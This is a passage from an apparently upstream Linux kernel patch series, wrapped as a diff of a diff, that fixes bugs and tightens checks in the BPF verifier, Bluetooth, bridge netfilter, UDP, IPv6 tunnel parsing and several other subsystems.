+@@ -637,11 +659,11 @@ static void __bpf_map_put(struct bpf_map *map, bool do_idr_lock)
+ 		/* bpf_map_free_id() must be called first */
+ 		bpf_map_free_id(map, do_idr_lock);
+ 		btf_put(map->btf);
+-		INIT_WORK(&map->work, bpf_map_free_deferred);
+-		/* Avoid spawning kworkers, since they all might contend
+-		 * for the same mutex like slab_mutex.
+-		 */
+-		queue_work(system_unbound_wq, &map->work);
++
++		if (READ_ONCE(map->free_after_mult_rcu_gp))
++			call_rcu_tasks_trace(&map->rcu, bpf_map_free_mult_rcu_gp);
++		else
++			bpf_map_free_in_work(map);
+ 	}
+ }
+ 
+@@ -3036,6 +3058,10 @@ static int bpf_tracing_prog_attach(struct bpf_prog *prog,
+ 	 *
+ 	 * - if prog->aux->dst_trampoline and tgt_prog is NULL, the program
+ 	 *   was detached and is going for re-attachment.
++	 *
++	 * - if prog->aux->dst_trampoline is NULL and tgt_prog and prog->aux->attach_btf
++	 *   are NULL, then program was already attached and user did not provide
++	 *   tgt_prog_fd so we have no way to find out or create trampoline
+ 	 */
+ 	if (!prog->aux->dst_trampoline && !tgt_prog) {
+ 		/*
+@@ -3049,6 +3075,11 @@ static int bpf_tracing_prog_attach(struct bpf_prog *prog,
+ 			err = -EINVAL;
+ 			goto out_unlock;
+ 		}
++		/* We can allow re-attach only if we have valid attach_btf. */
++		if (!prog->aux->attach_btf) {
++			err = -EINVAL;
++			goto out_unlock;
++		}
+ 		btf_id = prog->aux->attach_btf_id;
+ 		key = bpf_trampoline_compute_key(NULL, prog->aux->attach_btf, btf_id);
+ 	}
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 142e10d49fd81..23b6d57b5eef2 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -3284,7 +3284,7 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 	 * so it's aligned access and [off, off + size) are within stack limits
+ 	 */
+ 	if (!env->allow_ptr_leaks &&
+-	    state->stack[spi].slot_type[0] == STACK_SPILL &&
++	    is_spilled_reg(&state->stack[spi]) &&
+ 	    size != BPF_REG_SIZE) {
+ 		verbose(env, "attempt to corrupt spilled pointer on stack\n");
+ 		return -EACCES;
+@@ -4950,10 +4950,7 @@ static int check_stack_access_within_bounds(
+ 
+ 	if (tnum_is_const(reg->var_off)) {
+ 		min_off = reg->var_off.value + off;
+-		if (access_size > 0)
+-			max_off = min_off + access_size - 1;
+-		else
+-			max_off = min_off;
++		max_off = min_off + access_size;
+ 	} else {
+ 		if (reg->smax_value >= BPF_MAX_VAR_OFF ||
+ 		    reg->smin_value <= -BPF_MAX_VAR_OFF) {
+@@ -4962,15 +4959,12 @@ static int check_stack_access_within_bounds(
+ 			return -EACCES;
+ 		}
+ 		min_off = reg->smin_value + off;
+-		if (access_size > 0)
+-			max_off = reg->smax_value + off + access_size - 1;
+-		else
+-			max_off = min_off;
++		max_off = reg->smax_value + off + access_size;
+ 	}
+ 
+ 	err = check_stack_slot_within_bounds(min_off, state, type);
+-	if (!err)
+-		err = check_stack_slot_within_bounds(max_off, state, type);
++	if (!err && max_off > 0)
++		err = -EINVAL; /* out of stack access into non-negative offsets */
+ 
+ 	if (err) {
+ 		if (tnum_is_const(reg->var_off)) {
+@@ -7284,6 +7278,13 @@ static int prepare_func_exit(struct bpf_verifier_env *env, int *insn_idx)
+ 			verbose(env, "R0 not a scalar value\n");
+ 			return -EACCES;
+ 		}
++
++		/* we are going to rely on register's precise value */
++		err = mark_reg_read(env, r0, r0->parent, REG_LIVE_READ64);
++		err = err ?: mark_chain_precision(env, BPF_REG_0);
++		if (err)
++			return err;
++
+ 		if (!tnum_in(range, r0->var_off)) {
+ 			verbose_invalid_scalar(env, r0, &range, "callback return", "R0");
+ 			return -EINVAL;
+@@ -8540,6 +8541,10 @@ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
+ 	}
+ 
+ 	switch (base_type(ptr_reg->type)) {
++	case PTR_TO_FLOW_KEYS:
++		if (known)
++			break;
++		fallthrough;
+ 	case CONST_PTR_TO_MAP:
+ 		/* smin_val represents the known value */
+ 		if (known && smin_val == 0 && opcode == BPF_ADD)
+diff --git a/kernel/debug/kdb/kdb_main.c b/kernel/debug/kdb/kdb_main.c
+index 438b868cbfa92..35aa2e98a92a9 100644
+--- a/kernel/debug/kdb/kdb_main.c
++++ b/kernel/debug/kdb/kdb_main.c
+@@ -1349,8 +1349,6 @@ do_full_getstr:
+ 		/* PROMPT can only be set if we have MEM_READ permission. */
+ 		snprintf(kdb_prompt_str, CMD_BUFLEN, kdbgetenv("PROMPT"),
+ 			 raw_smp_processor_id());
+-		if (defcmd_in_progress)
+-			strncat(kdb_prompt_str, "[defcmd]", CMD_BUFLEN);
+ 
+ 		/*
+ 		 * Fetch command from keyboard
+diff --git a/kernel/dma/coherent.c b/kernel/dma/coherent.c
+index c21abc77c53e9..ff5683a57f771 100644
+--- a/kernel/dma/coherent.c
++++ b/kernel/dma/coherent.c
+@@ -132,8 +132,10 @@ int dma_declare_coherent_memory(struct device *dev, phys_addr_t phys_addr,
+ 
+ void dma_release_coherent_memory(struct device *dev)
+ {
+-	if (dev)
++	if (dev) {
+ 		_dma_release_coherent_memory(dev->dma_mem);
++		dev->dma_mem = NULL;
++	}
+ }
+ 
+ static void *__dma_alloc_from_coherent(struct device *dev,
+diff --git a/kernel/rcu/tasks.h b/kernel/rcu/tasks.h
+index c1f18c63b9b14..b5d5b6cf093a7 100644
+--- a/kernel/rcu/tasks.h
++++ b/kernel/rcu/tasks.h
+@@ -1570,6 +1570,8 @@ static void rcu_tasks_trace_postscan(struct list_head *hop)
+ {
+ 	// Wait for late-stage exiting tasks to finish exiting.
+ 	// These might have passed the call to exit_tasks_rcu_finish().
++
++	// If you remove the following line, update rcu_trace_implies_rcu_gp()!!!
+ 	synchronize_rcu();
+ 	// Any tasks that exit after this point will set
+ 	// TRC_NEED_QS_CHECKED in ->trc_reader_special.b.need_qs.
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index 798e1841d2863..1a5d02224d465 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -1556,13 +1556,18 @@ void tick_setup_sched_timer(void)
+ void tick_cancel_sched_timer(int cpu)
+ {
+ 	struct tick_sched *ts = &per_cpu(tick_cpu_sched, cpu);
++	ktime_t idle_sleeptime, iowait_sleeptime;
+ 
+ # ifdef CONFIG_HIGH_RES_TIMERS
+ 	if (ts->sched_timer.base)
+ 		hrtimer_cancel(&ts->sched_timer);
+ # endif
+ 
++	idle_sleeptime = ts->idle_sleeptime;
++	iowait_sleeptime = ts->iowait_sleeptime;
+ 	memset(ts, 0, sizeof(*ts));
++	ts->idle_sleeptime = idle_sleeptime;
++	ts->iowait_sleeptime = iowait_sleeptime;
+ }
+ #endif
+ 
+diff --git a/lib/kunit/debugfs.c b/lib/kunit/debugfs.c
+index b08bb1fba106d..de5e71458358e 100644
+--- a/lib/kunit/debugfs.c
++++ b/lib/kunit/debugfs.c
+@@ -52,12 +52,14 @@ static void debugfs_print_result(struct seq_file *seq,
+ static int debugfs_print_results(struct seq_file *seq, void *v)
+ {
+ 	struct kunit_suite *suite = (struct kunit_suite *)seq->private;
+-	enum kunit_status success = kunit_suite_has_succeeded(suite);
++	enum kunit_status success;
+ 	struct kunit_case *test_case;
+ 
+ 	if (!suite)
+ 		return 0;
+ 
++	success = kunit_suite_has_succeeded(suite);
++
+ 	/* Print KTAP header so the debugfs log can be parsed as valid KTAP. */
+ 	seq_puts(seq, "KTAP version 1\n");
+ 	seq_puts(seq, "1..1\n");
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 55e0ecd88543e..12d36875358b9 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -2314,12 +2314,10 @@ static int hci_conn_auth(struct hci_conn *conn, __u8 sec_level, __u8 auth_type)
+ 		hci_send_cmd(conn->hdev, HCI_OP_AUTH_REQUESTED,
+ 			     sizeof(cp), &cp);
+ 
+-		/* If we're already encrypted set the REAUTH_PEND flag,
+-		 * otherwise set the ENCRYPT_PEND.
++		/* Set the ENCRYPT_PEND to trigger encryption after
++		 * authentication.
+ 		 */
+-		if (test_bit(HCI_CONN_ENCRYPT, &conn->flags))
+-			set_bit(HCI_CONN_REAUTH_PEND, &conn->flags);
+-		else
++		if (!test_bit(HCI_CONN_ENCRYPT, &conn->flags))
+ 			set_bit(HCI_CONN_ENCRYPT_PEND, &conn->flags);
+ 	}
+ 
+diff --git a/net/bluetooth/hci_debugfs.c b/net/bluetooth/hci_debugfs.c
+index 3f401ec5bb0c6..6124b3425f351 100644
+--- a/net/bluetooth/hci_debugfs.c
++++ b/net/bluetooth/hci_debugfs.c
+@@ -1045,10 +1045,12 @@ static int min_key_size_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val > hdev->le_max_key_size || val < SMP_MIN_ENC_KEY_SIZE)
++	hci_dev_lock(hdev);
++	if (val > hdev->le_max_key_size || val < SMP_MIN_ENC_KEY_SIZE) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_min_key_size = val;
+ 	hci_dev_unlock(hdev);
+ 
+@@ -1073,10 +1075,12 @@ static int max_key_size_set(void *data, u64 val)
+ {
+ 	struct hci_dev *hdev = data;
+ 
+-	if (val > SMP_MAX_ENC_KEY_SIZE || val < hdev->le_min_key_size)
++	hci_dev_lock(hdev);
++	if (val > SMP_MAX_ENC_KEY_SIZE || val < hdev->le_min_key_size) {
++		hci_dev_unlock(hdev);
+ 		return -EINVAL;
++	}
+ 
+-	hci_dev_lock(hdev);
+ 	hdev->le_max_key_size = val;
+ 	hci_dev_unlock(hdev);
+ 
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index dcb13c64e8e7c..56ecc5f97b916 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -3511,14 +3511,8 @@ static void hci_auth_complete_evt(struct hci_dev *hdev, void *data,
+ 
+ 	if (!ev->status) {
+ 		clear_bit(HCI_CONN_AUTH_FAILURE, &conn->flags);
+-
+-		if (!hci_conn_ssp_enabled(conn) &&
+-		    test_bit(HCI_CONN_REAUTH_PEND, &conn->flags)) {
+-			bt_dev_info(hdev, "re-auth of legacy device is not possible.");
+-		} else {
+-			set_bit(HCI_CONN_AUTH, &conn->flags);
+-			conn->sec_level = conn->pending_sec_level;
+-		}
++		set_bit(HCI_CONN_AUTH, &conn->flags);
++		conn->sec_level = conn->pending_sec_level;
+ 	} else {
+ 		if (ev->status == HCI_ERROR_PIN_OR_KEY_MISSING)
+ 			set_bit(HCI_CONN_AUTH_FAILURE, &conn->flags);
+@@ -3527,7 +3521,6 @@ static void hci_auth_complete_evt(struct hci_dev *hdev, void *data,
+ 	}
+ 
+ 	clear_bit(HCI_CONN_AUTH_PEND, &conn->flags);
+-	clear_bit(HCI_CONN_REAUTH_PEND, &conn->flags);
+ 
+ 	if (conn->state == BT_CONFIG) {
+ 		if (!ev->status && hci_conn_ssp_enabled(conn)) {
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 01d690d9fe5f8..202ad43e35d6b 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -279,8 +279,17 @@ int br_nf_pre_routing_finish_bridge(struct net *net, struct sock *sk, struct sk_
+ 
+ 		if ((READ_ONCE(neigh->nud_state) & NUD_CONNECTED) &&
+ 		    READ_ONCE(neigh->hh.hh_len)) {
++			struct net_device *br_indev;
++
++			br_indev = nf_bridge_get_physindev(skb, net);
++			if (!br_indev) {
++				neigh_release(neigh);
++				goto free_skb;
++			}
++
+ 			neigh_hh_bridge(&neigh->hh, skb);
+-			skb->dev = nf_bridge->physindev;
++			skb->dev = br_indev;
++
+ 			ret = br_handle_frame_finish(net, sk, skb);
+ 		} else {
+ 			/* the neighbour function below overwrites the complete
+@@ -352,12 +361,18 @@ br_nf_ipv4_daddr_was_changed(const struct sk_buff *skb,
+  */
+ static int br_nf_pre_routing_finish(struct net *net, struct sock *sk, struct sk_buff *skb)
+ {
+-	struct net_device *dev = skb->dev;
++	struct net_device *dev = skb->dev, *br_indev;
+ 	struct iphdr *iph = ip_hdr(skb);
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 	struct rtable *rt;
+ 	int err;
+ 
++	br_indev = nf_bridge_get_physindev(skb, net);
++	if (!br_indev) {
++		kfree_skb(skb);
++		return 0;
++	}
++
+ 	nf_bridge->frag_max_size = IPCB(skb)->frag_max_size;
+ 
+ 	if (nf_bridge->pkt_otherhost) {
+@@ -397,7 +412,7 @@ free_skb:
+ 		} else {
+ 			if (skb_dst(skb)->dev == dev) {
+ bridged_dnat:
+-				skb->dev = nf_bridge->physindev;
++				skb->dev = br_indev;
+ 				nf_bridge_update_protocol(skb);
+ 				nf_bridge_push_encap_header(skb);
+ 				br_nf_hook_thresh(NF_BR_PRE_ROUTING,
+@@ -410,7 +425,7 @@ bridged_dnat:
+ 			skb->pkt_type = PACKET_HOST;
+ 		}
+ 	} else {
+-		rt = bridge_parent_rtable(nf_bridge->physindev);
++		rt = bridge_parent_rtable(br_indev);
+ 		if (!rt) {
+ 			kfree_skb(skb);
+ 			return 0;
+@@ -419,7 +434,7 @@ bridged_dnat:
+ 		skb_dst_set_noref(skb, &rt->dst);
+ 	}
+ 
+-	skb->dev = nf_bridge->physindev;
++	skb->dev = br_indev;
+ 	nf_bridge_update_protocol(skb);
+ 	nf_bridge_push_encap_header(skb);
+ 	br_nf_hook_thresh(NF_BR_PRE_ROUTING, net, sk, skb, skb->dev, NULL,
+@@ -456,7 +471,7 @@ struct net_device *setup_pre_routing(struct sk_buff *skb, const struct net *net)
+ 	}
+ 
+ 	nf_bridge->in_prerouting = 1;
+-	nf_bridge->physindev = skb->dev;
++	nf_bridge->physinif = skb->dev->ifindex;
+ 	skb->dev = brnf_get_logical_dev(skb, skb->dev, net);
+ 
+ 	if (skb->protocol == htons(ETH_P_8021Q))
+@@ -553,7 +568,11 @@ static int br_nf_forward_finish(struct net *net, struct sock *sk, struct sk_buff
+ 		if (skb->protocol == htons(ETH_P_IPV6))
+ 			nf_bridge->frag_max_size = IP6CB(skb)->frag_max_size;
+ 
+-		in = nf_bridge->physindev;
++		in = nf_bridge_get_physindev(skb, net);
++		if (!in) {
++			kfree_skb(skb);
++			return 0;
++		}
+ 		if (nf_bridge->pkt_otherhost) {
+ 			skb->pkt_type = PACKET_OTHERHOST;
+ 			nf_bridge->pkt_otherhost = false;
+@@ -897,6 +916,13 @@ static unsigned int ip_sabotage_in(void *priv,
+ static void br_nf_pre_routing_finish_bridge_slow(struct sk_buff *skb)
+ {
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
++	struct net_device *br_indev;
++
++	br_indev = nf_bridge_get_physindev(skb, dev_net(skb->dev));
++	if (!br_indev) {
++		kfree_skb(skb);
++		return;
++	}
+ 
+ 	skb_pull(skb, ETH_HLEN);
+ 	nf_bridge->bridged_dnat = 0;
+@@ -906,7 +932,7 @@ static void br_nf_pre_routing_finish_bridge_slow(struct sk_buff *skb)
+ 	skb_copy_to_linear_data_offset(skb, -(ETH_HLEN - ETH_ALEN),
+ 				       nf_bridge->neigh_header,
+ 				       ETH_HLEN - ETH_ALEN);
+-	skb->dev = nf_bridge->physindev;
++	skb->dev = br_indev;
+ 
+ 	nf_bridge->physoutdev = NULL;
+ 	br_handle_frame_finish(dev_net(skb->dev), NULL, skb);
+diff --git a/net/bridge/br_netfilter_ipv6.c b/net/bridge/br_netfilter_ipv6.c
+index 6b07f30675bb0..cd24ab9bb136f 100644
+--- a/net/bridge/br_netfilter_ipv6.c
++++ b/net/bridge/br_netfilter_ipv6.c
+@@ -161,9 +161,15 @@ static int br_nf_pre_routing_finish_ipv6(struct net *net, struct sock *sk, struc
+ {
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 	struct rtable *rt;
+-	struct net_device *dev = skb->dev;
++	struct net_device *dev = skb->dev, *br_indev;
+ 	const struct nf_ipv6_ops *v6ops = nf_get_ipv6_ops();
+ 
++	br_indev = nf_bridge_get_physindev(skb, net);
++	if (!br_indev) {
++		kfree_skb(skb);
++		return 0;
++	}
++
+ 	nf_bridge->frag_max_size = IP6CB(skb)->frag_max_size;
+ 
+ 	if (nf_bridge->pkt_otherhost) {
+@@ -181,7 +187,7 @@ static int br_nf_pre_routing_finish_ipv6(struct net *net, struct sock *sk, struc
+ 		}
+ 
+ 		if (skb_dst(skb)->dev == dev) {
+-			skb->dev = nf_bridge->physindev;
++			skb->dev = br_indev;
+ 			nf_bridge_update_protocol(skb);
+ 			nf_bridge_push_encap_header(skb);
+ 			br_nf_hook_thresh(NF_BR_PRE_ROUTING,
+@@ -192,7 +198,7 @@ static int br_nf_pre_routing_finish_ipv6(struct net *net, struct sock *sk, struc
+ 		ether_addr_copy(eth_hdr(skb)->h_dest, dev->dev_addr);
+ 		skb->pkt_type = PACKET_HOST;
+ 	} else {
+-		rt = bridge_parent_rtable(nf_bridge->physindev);
++		rt = bridge_parent_rtable(br_indev);
+ 		if (!rt) {
+ 			kfree_skb(skb);
+ 			return 0;
+@@ -201,7 +207,7 @@ static int br_nf_pre_routing_finish_ipv6(struct net *net, struct sock *sk, struc
+ 		skb_dst_set_noref(skb, &rt->dst);
+ 	}
+ 
+-	skb->dev = nf_bridge->physindev;
++	skb->dev = br_indev;
+ 	nf_bridge_update_protocol(skb);
+ 	nf_bridge_push_encap_header(skb);
+ 	br_nf_hook_thresh(NF_BR_PRE_ROUTING, net, sk, skb,
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 854b3fd66b1be..7cf1e42d7f93b 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -2797,13 +2797,6 @@ static int do_setlink(const struct sk_buff *skb,
+ 		call_netdevice_notifiers(NETDEV_CHANGEADDR, dev);
+ 	}
+ 
+-	if (tb[IFLA_MASTER]) {
+-		err = do_set_master(dev, nla_get_u32(tb[IFLA_MASTER]), extack);
+-		if (err)
+-			goto errout;
+-		status |= DO_SETLINK_MODIFIED;
+-	}
+-
+ 	if (ifm->ifi_flags || ifm->ifi_change) {
+ 		err = dev_change_flags(dev, rtnl_dev_combine_flags(dev, ifm),
+ 				       extack);
+@@ -2811,6 +2804,13 @@ static int do_setlink(const struct sk_buff *skb,
+ 			goto errout;
+ 	}
+ 
++	if (tb[IFLA_MASTER]) {
++		err = do_set_master(dev, nla_get_u32(tb[IFLA_MASTER]), extack);
++		if (err)
++			goto errout;
++		status |= DO_SETLINK_MODIFIED;
++	}
++
+ 	if (tb[IFLA_CARRIER]) {
+ 		err = dev_change_carrier(dev, nla_get_u8(tb[IFLA_CARRIER]));
+ 		if (err)
+diff --git a/net/dns_resolver/dns_key.c b/net/dns_resolver/dns_key.c
+index 8324e9f970668..26a9d8434c234 100644
+--- a/net/dns_resolver/dns_key.c
++++ b/net/dns_resolver/dns_key.c
+@@ -104,7 +104,7 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ 		const struct dns_server_list_v1_header *v1;
+ 
+ 		/* It may be a server list. */
+-		if (datalen <= sizeof(*v1))
++		if (datalen < sizeof(*v1))
+ 			return -EINVAL;
+ 
+ 		v1 = (const struct dns_server_list_v1_header *)data;
+diff --git a/net/ethtool/features.c b/net/ethtool/features.c
+index 55d449a2d3fcb..090e493f592ef 100644
+--- a/net/ethtool/features.c
++++ b/net/ethtool/features.c
+@@ -234,17 +234,20 @@ int ethnl_set_features(struct sk_buff *skb, struct genl_info *info)
+ 	dev = req_info.dev;
+ 
+ 	rtnl_lock();
++	ret = ethnl_ops_begin(dev);
++	if (ret < 0)
++		goto out_rtnl;
+ 	ethnl_features_to_bitmap(old_active, dev->features);
+ 	ethnl_features_to_bitmap(old_wanted, dev->wanted_features);
+ 	ret = ethnl_parse_bitset(req_wanted, req_mask, NETDEV_FEATURE_COUNT,
+ 				 tb[ETHTOOL_A_FEATURES_WANTED],
+ 				 netdev_features_strings, info->extack);
+ 	if (ret < 0)
+-		goto out_rtnl;
++		goto out_ops;
+ 	if (ethnl_bitmap_to_features(req_mask) & ~NETIF_F_ETHTOOL_BITS) {
+ 		GENL_SET_ERR_MSG(info, "attempt to change non-ethtool features");
+ 		ret = -EINVAL;
+-		goto out_rtnl;
++		goto out_ops;
+ 	}
+ 
+ 	/* set req_wanted bits not in req_mask from old_wanted */
+@@ -281,6 +284,8 @@ int ethnl_set_features(struct sk_buff *skb, struct genl_info *info)
+ 	if (mod)
+ 		netdev_features_change(dev);
+ 
++out_ops:
++	ethnl_ops_complete(dev);
+ out_rtnl:
+ 	rtnl_unlock();
+ 	ethnl_parse_header_dev_put(&req_info);
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 347c3768df6e8..c13b8ed63f87e 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -1642,6 +1642,7 @@ int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
+ #endif
+ 	return -EINVAL;
+ }
++EXPORT_SYMBOL(inet_recv_error);
+ 
+ int inet_gro_complete(struct sk_buff *skb, int nhoff)
+ {
+diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c
+index e04544ac4b454..b807197475a57 100644
+--- a/net/ipv4/ipmr.c
++++ b/net/ipv4/ipmr.c
+@@ -1025,6 +1025,10 @@ static int ipmr_cache_report(const struct mr_table *mrt,
+ 	struct sk_buff *skb;
+ 	int ret;
+ 
++	mroute_sk = rcu_dereference(mrt->mroute_sk);
++	if (!mroute_sk)
++		return -EINVAL;
++
+ 	if (assert == IGMPMSG_WHOLEPKT || assert == IGMPMSG_WRVIFWHOLE)
+ 		skb = skb_realloc_headroom(pkt, sizeof(struct iphdr));
+ 	else
+@@ -1069,7 +1073,8 @@ static int ipmr_cache_report(const struct mr_table *mrt,
+ 		msg = (struct igmpmsg *)skb_network_header(skb);
+ 		msg->im_vif = vifi;
+ 		msg->im_vif_hi = vifi >> 8;
+-		skb_dst_set(skb, dst_clone(skb_dst(pkt)));
++		ipv4_pktinfo_prepare(mroute_sk, pkt);
++		memcpy(skb->cb, pkt->cb, sizeof(skb->cb));
+ 		/* Add our header */
+ 		igmp = skb_put(skb, sizeof(struct igmphdr));
+ 		igmp->type = assert;
+@@ -1079,12 +1084,6 @@ static int ipmr_cache_report(const struct mr_table *mrt,
+ 		skb->transport_header = skb->network_header;
+ 	}
+ 
+-	mroute_sk = rcu_dereference(mrt->mroute_sk);
+-	if (!mroute_sk) {
+-		kfree_skb(skb);
+-		return -EINVAL;
+-	}
+-
+ 	igmpmsg_netlink_event(mrt, skb);
+ 
+ 	/* Deliver to mrouted */
+diff --git a/net/ipv4/netfilter/nf_reject_ipv4.c b/net/ipv4/netfilter/nf_reject_ipv4.c
+index d640adcaf1b12..4073762996e22 100644
+--- a/net/ipv4/netfilter/nf_reject_ipv4.c
++++ b/net/ipv4/netfilter/nf_reject_ipv4.c
+@@ -239,7 +239,6 @@ static int nf_reject_fill_skb_dst(struct sk_buff *skb_in)
+ void nf_send_reset(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 		   int hook)
+ {
+-	struct net_device *br_indev __maybe_unused;
+ 	struct sk_buff *nskb;
+ 	struct iphdr *niph;
+ 	const struct tcphdr *oth;
+@@ -288,9 +287,13 @@ void nf_send_reset(struct net *net, struct sock *sk, struct sk_buff *oldskb,
+ 	 * build the eth header using the original destination's MAC as the
+ 	 * source, and send the RST packet directly.
+ 	 */
+-	br_indev = nf_bridge_get_physindev(oldskb);
+-	if (br_indev) {
++	if (nf_bridge_info_exists(oldskb)) {
+ 		struct ethhdr *oeth = eth_hdr(oldskb);
++		struct net_device *br_indev;
++
++		br_indev = nf_bridge_get_physindev(oldskb, net);
++		if (!br_indev)
++			goto free_nskb;
+ 
+ 		nskb->dev = br_indev;
+ 		niph->tot_len = htons(nskb->len);
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 5672d9a86c5d2..11c0e1c666429 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -823,7 +823,7 @@ void udp_flush_pending_frames(struct sock *sk)
+ 
+ 	if (up->pending) {
+ 		up->len = 0;
+-		up->pending = 0;
++		WRITE_ONCE(up->pending, 0);
+ 		ip_flush_pending_frames(sk);
+ 	}
+ }
+@@ -1010,7 +1010,7 @@ int udp_push_pending_frames(struct sock *sk)
+ 
+ out:
+ 	up->len = 0;
+-	up->pending = 0;
++	WRITE_ONCE(up->pending, 0);
+ 	return err;
+ }
+ EXPORT_SYMBOL(udp_push_pending_frames);
+@@ -1086,7 +1086,7 @@ int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 	getfrag = is_udplite ? udplite_getfrag : ip_generic_getfrag;
+ 
+ 	fl4 = &inet->cork.fl.u.ip4;
+-	if (up->pending) {
++	if (READ_ONCE(up->pending)) {
+ 		/*
+ 		 * There are pending frames.
+ 		 * The socket lock must be held while it's corked.
+@@ -1287,7 +1287,7 @@ back_from_confirm:
+ 	fl4->saddr = saddr;
+ 	fl4->fl4_dport = dport;
+ 	fl4->fl4_sport = inet->inet_sport;
+-	up->pending = AF_INET;
++	WRITE_ONCE(up->pending, AF_INET);
+ 
+ do_append_data:
+ 	up->len += ulen;
+@@ -1299,7 +1299,7 @@ do_append_data:
+ 	else if (!corkreq)
+ 		err = udp_push_pending_frames(sk);
+ 	else if (unlikely(skb_queue_empty(&sk->sk_write_queue)))
+-		up->pending = 0;
++		WRITE_ONCE(up->pending, 0);
+ 	release_sock(sk);
+ 
+ out:
+@@ -1337,7 +1337,7 @@ void udp_splice_eof(struct socket *sock)
+ 	struct sock *sk = sock->sk;
+ 	struct udp_sock *up = udp_sk(sk);
+ 
+-	if (!up->pending || udp_test_bit(CORK, sk))
++	if (!READ_ONCE(up->pending) || udp_test_bit(CORK, sk))
+ 		return;
+ 
+ 	lock_sock(sk);
+diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c
+index afc922c88d179..9125e92d9917e 100644
+--- a/net/ipv6/ip6_tunnel.c
++++ b/net/ipv6/ip6_tunnel.c
+@@ -399,7 +399,7 @@ __u16 ip6_tnl_parse_tlv_enc_lim(struct sk_buff *skb, __u8 *raw)
+ 	const struct ipv6hdr *ipv6h = (const struct ipv6hdr *)raw;
+ 	unsigned int nhoff = raw - skb->data;
+ 	unsigned int off = nhoff + sizeof(*ipv6h);
+-	u8 next, nexthdr = ipv6h->nexthdr;
++	u8 nexthdr = ipv6h->nexthdr;
+ 
+ 	while (ipv6_ext_hdr(nexthdr) && nexthdr != NEXTHDR_NONE) {
+ 		struct ipv6_opt_hdr *hdr;
+@@ -410,25 +410,25 @@ __u16 ip6_tnl_parse_tlv_enc_lim(struct sk_buff *skb, __u8 *raw)
+ 
+ 		hdr = (struct ipv6_opt_hdr *)(skb->data + off);
+ 		if (nexthdr == NEXTHDR_FRAGMENT) {
+-			struct frag_hdr *frag_hdr = (struct frag_hdr *) hdr;
+-			if (frag_hdr->frag_off)
+-				break;
+ 			optlen = 8;
+ 		} else if (nexthdr == NEXTHDR_AUTH) {
+ 			optlen = ipv6_authlen(hdr);
+ 		} else {
+ 			optlen = ipv6_optlen(hdr);
+ 		}
+-		/* cache hdr->nexthdr, since pskb_may_pull() might
+-		 * invalidate hdr
+-		 */
+-		next = hdr->nexthdr;
+-		if (nexthdr == NEXTHDR_DEST) {
+-			u16 i = 2;
+ 
+-			/* Remember : hdr is no longer valid at this point. */
+-			if (!pskb_may_pull(skb, off + optlen))
++		if (!pskb_may_pull(skb, off + optlen))
++			break;
++
++		hdr = (struct ipv6_opt_hdr *)(skb->data + off);
++		if (nexthdr == NEXTHDR_FRAGMENT) {
++			struct frag_hdr *frag_hdr = (struct frag_hdr *)hdr;
++
++			if (frag_hdr->frag_off)
+ 				break;
++		}
++		if (nexthdr == NEXTHDR_DEST) {
++			u16 i = 2;
+ 
+ 			while (1) {
+ 				struct ipv6_tlv_tnl_enc_lim *tel;
+@@ -449,7 +449,7 @@ __u16 ip6_tnl_parse_tlv_enc_lim(struct sk_buff *skb, __u8 *raw)
+ 					i++;
+ 			}
+ 		}
+-		nexthdr = next;
++		nexthdr = hdr->nexthdr;
+ 		off += optlen;
+ 	}
+ 	return 0;
+diff --git a/net/ipv6/mcast.c b/net/ipv6/mcast.c
+index 7860383295d84..566f3b7b957e9 100644
+--- a/net/ipv6/mcast.c
++++ b/net/ipv6/mcast.c
+@@ -2725,8 +2725,12 @@ void ipv6_mc_down(struct inet6_dev *idev)
+ 	synchronize_net();
+ 	mld_query_stop_work(idev);
+ 	mld_report_stop_work(idev);
++
++	mutex_lock(&idev->mc_lock);
+ 	mld_ifc_stop_work(idev);
+ 	mld_gq_stop_work(idev);
++	mutex_unlock(&idev->mc_lock);
++
+ 	mld_dad_stop_work(idev);
+ }
+ 
+diff --git a/net/ipv6/netfilter/nf_reject_ipv6.c b/net/ipv6/netfilter/nf_reject_ipv6.c
+index f61d4f18e1cf5..433d98bbe33f7 100644
+--- a/net/ipv6/netfilter/nf_reject_ipv6.c
++++ b/net/ipv6/netfilter/nf_reject_ipv6.c
+@@ -278,7 +278,6 @@ static int nf_reject6_fill_skb_dst(struct sk_buff *skb_in)
